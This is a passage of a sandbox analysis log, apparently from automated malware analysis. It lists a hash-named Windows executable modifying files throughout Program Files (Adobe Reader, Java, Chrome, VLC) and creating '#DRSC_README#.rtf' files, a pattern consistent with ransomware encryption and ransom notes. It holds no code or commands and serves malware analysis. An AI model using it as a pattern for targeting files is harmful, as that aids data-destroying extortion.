710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\next-arrow-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\be_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\s_agreement_filetype.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\classlist 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\nl_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ru.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\logging.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\config.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jfr\profile.jfc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\keytool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviewers.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforcomments.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_zh_tw_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\profile.jfc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\warning.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\LICENSE.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-options.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Measure.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\s_listview_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_empty_state.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_LinkDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-57x57-precomposed.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_uinline_warning.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\illustrations_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\index.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_newfolder-default.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\release 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ar_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management\management.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Spelling.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\splash.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_auditreport_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyrun.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javap.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\rmid.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\convertpdf-tool-view.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\custom_poster.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_invite_24.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\external_extensions.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\pages-app-selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ko_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\gmail.crx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_LinkDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\cmm\CIEXYZ.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\create_form.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_cs_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\file_info2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for 